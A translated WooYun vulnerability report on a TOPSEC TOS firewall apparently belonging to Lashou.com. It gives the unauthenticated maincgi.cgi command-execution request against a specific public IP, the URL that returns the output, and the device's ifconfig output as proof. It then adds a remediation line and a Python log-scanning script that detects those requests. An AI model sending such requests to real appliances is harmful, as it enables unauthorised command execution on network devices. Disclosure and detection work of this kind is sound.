
Command execution on a Lashou.com (拉手网) system

2015-12-19 16:00

A TOPSEC TOS firewall appliance belonging to Lashou.com has a command execution vulnerability.



Code area
https://59.151.89.6:8080/cgi/maincgi.cgi?Url=Command&Action=id&Para=id



After the command has executed, the returned result can be viewed via

Code area
https://59.151.89.6:8080/cgi/maincgi.cgi?Url=CommandResult



Proof of vulnerability:

lashou1111111.jpg



lashou2222222.jpg



I took a look at the internal IP addresses:

Code area
dummy     Link encap:Point-to-Point Protocol
          inet addr:1.2.3.4  P-t-P:1.2.3.4  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:65534  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160915315 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:3167400654 (3020.6 Mb)

eth0      Link encap:Ethernet  HWaddr 00:13:32:0A:61:B2
          inet addr:192.168.1.254  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:10 Base address:0xbc00 Memory:fe9e0000-fea00000

eth1      Link encap:Ethernet  HWaddr 00:13:32:0A:61:B3
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:5 Base address:0xcc00 Memory:feae0000-feb00000

eth10     Link encap:Ethernet  HWaddr 00:13:32:06:16:54
          inet addr:10.168.22.1  Bcast:10.168.22.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2505880170 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4028329592 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:3968265358 (3784.4 Mb)  TX bytes:2382826955 (2272.4 Mb)



These match the internal and external network ranges previously seen for Lashou, and the external address also lies in one of Lashou's /24 (class C) ranges, so it can be concluded that this is a Lashou device.

Remediation:

Restrict access to maincgi.cgi.
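Until access to the CGI is restricted, a defender can at least spot the request pattern described in this report in the web server's access log. The following script is an added example, not part of the WooYun report and not TOPSEC code: it parses Common Log Format lines, picks out requests to /cgi/maincgi.cgi whose Url parameter is Command or CommandResult (the two values named above), and marks whether the source address falls inside an assumed management network. The log lines, timestamps and the trusted address ranges are constructed for the example.

```python
"""Flag access-log requests to the TOPSEC TOS maincgi.cgi command endpoint.

Added example (not from the report or the vendor). Sample data and the
trusted management ranges below are constructed placeholders.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log in Common Log Format; addresses are documentation ranges.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Dec/2015:15:58:01 +0800] "GET /cgi/maincgi.cgi?Url=Login HTTP/1.1" 200 512
203.0.113.7 - - [19/Dec/2015:16:00:12 +0800] "GET /cgi/maincgi.cgi?Url=Command&Action=id&Para=id HTTP/1.1" 200 88
203.0.113.7 - - [19/Dec/2015:16:00:13 +0800] "GET /cgi/maincgi.cgi?Url=CommandResult HTTP/1.1" 200 1024
10.0.0.9 - - [19/Dec/2015:16:01:40 +0800] "GET /index.html HTTP/1.1" 200 2048
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target HTTP/x.y", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Networks from which management access to the appliance is expected (assumed placeholders).
TRUSTED_NETS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.0.0/16"),
)

# Url values named in the report: Command runs a command, CommandResult fetches its output.
COMMAND_URLS = {"command", "commandresult"}


def parse_line(line):
    """Split one CLF line into its fields; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze_request(entry):
    """Return a finding dict if the request targets the command CGI, else None."""
    parts = urlsplit(entry["target"])
    if not parts.path.lower().endswith("/cgi/maincgi.cgi"):
        return None
    # Normalise parameter names so Url/url/URL are treated alike; keep the first value.
    params = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    url_val = params.get("url", "")
    if url_val.lower() not in COMMAND_URLS:
        return None
    try:
        src = ipaddress.ip_address(entry["ip"])
        trusted = any(src in net for net in TRUSTED_NETS)
    except ValueError:  # not an IP literal (e.g. a resolved hostname): treat as untrusted
        trusted = False
    return {
        "ip": entry["ip"],
        "time": entry["ts"],
        "url": url_val,
        "action": params.get("action"),
        "para": params.get("para"),
        "status": int(entry["status"]),
        "trusted_source": trusted,
    }


def find_command_requests(log_text):
    """Scan a whole log and return the list of findings in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = analyze_request(entry)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_command_requests(SAMPLE_LOG):
        origin = "trusted" if f["trusted_source"] else "UNTRUSTED"
        print(f"{f['time']} {f['ip']:<15} {origin:<9} Url={f['url']} "
              f"Action={f['action']} Para={f['para']} status={f['status']}")
```

Requests flagged with an untrusted source are the ones worth an immediate look; a hit from inside the management range still deserves a check against the change log, since the endpoint returns the command output on a second, unauthenticated request.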

Source: www.wooyun.org/bugs/wooyun-2015-0160355
